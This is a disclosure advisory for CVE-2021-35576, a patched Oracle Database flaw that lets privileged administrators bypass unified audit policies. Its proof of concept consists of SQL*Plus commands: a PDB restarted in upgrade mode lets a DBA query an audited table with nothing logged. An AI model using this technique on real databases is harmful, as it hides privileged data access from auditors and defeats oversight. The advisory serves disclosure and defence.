Oracle Unified Audit Policy Bypass Vulnerability

Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPass
Product:                   Database
Manufacturer:              Oracle
Affected Version(s):       12.1.0.2, 12.2.0.1, 19c
Tested Version(s):         19c
Risk Level:                low
Solution Status:           Fixed
Manufacturer Notification: 2021-03-17
Solution Date:             2021-10-17
Public Disclosure:         2022-06-11
CVE Reference:             CVE-2021-35576
Author of Advisory:        Emad Al-Mousa

Overview:
Oracle Database is a general purpose relational database management system (RDMBS).
Unified Auditing is the supported mechanism to capture database audit logs. The unified audit trail captures audit information from a variety of sources.The unified audit trail, which resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, makes this information available in a uniform format in the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, then grant them the AUDIT_VIEWER role.


*****************************************
Vulnerability Details:
The vulnerability will allow database administrator or system admin with access to the database server (either local login or remote authentication)to bypass a custom in-place audit policy defined in the oracle database system. Moreover, setting the database in upgrade mode will disable auditingand threat actor can perform malicious operations without detection.

*****************************************
Proof of Concept (PoC):
I will create a table in pluggable database PDB1 under HR schema and insert few records:
SQL> CREATE TABLE HR.EMPLOYEE
(
  FIRST_NAME  VARCHAR2(50),
  LAST_NAME   VARCHAR2(50)
);
SQL> INSERT INTO HR.EMPLOYEE (
   FIRST_NAME, LAST_NAME)
VALUES ( 'EMAD','MOUSA' );
SQL> commit;


SQL> INSERT INTO HR.EMPLOYEE (
   FIRST_NAME, LAST_NAME)
VALUES ( 'SAMI','MOUSA' );
SQL> commit;
I will now create audit policy:
SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;
SQL> audit policy SELECT_P1;
To check audit policies configured in PDB1 database:
SQL> SELECT * FROM audit_unified_enabled_policies;

Now, let us simulate executing the select statement against the monitored/audited table while database is in upgrade mode:
sqlplus / as sysdba
SQL> alter session set container=PDB1;
SQL> shutdown immediate;
SQL> startup upgrade;
SQL> select * from HR.EMPLOYEE;
SQL> startup force;
SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;


Checking the audit logs using the query, NO entry is found recorded in the unified audit trail:

SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME=’EMPLOYEE’ order by EVENT_TIMESTAMP desc;
So, even though audit policy was configured in the database a DBA/System Admin can view the audited sensitive table without a trace as No record will be populated in UNIFIED_AUDIT_TRAIL view !
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2021.html 
https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/
https://nvd.nist.gov/vuln/detail/CVE-2021-35576

Credit:
Emad Al-Mousa: CVE-2021-35576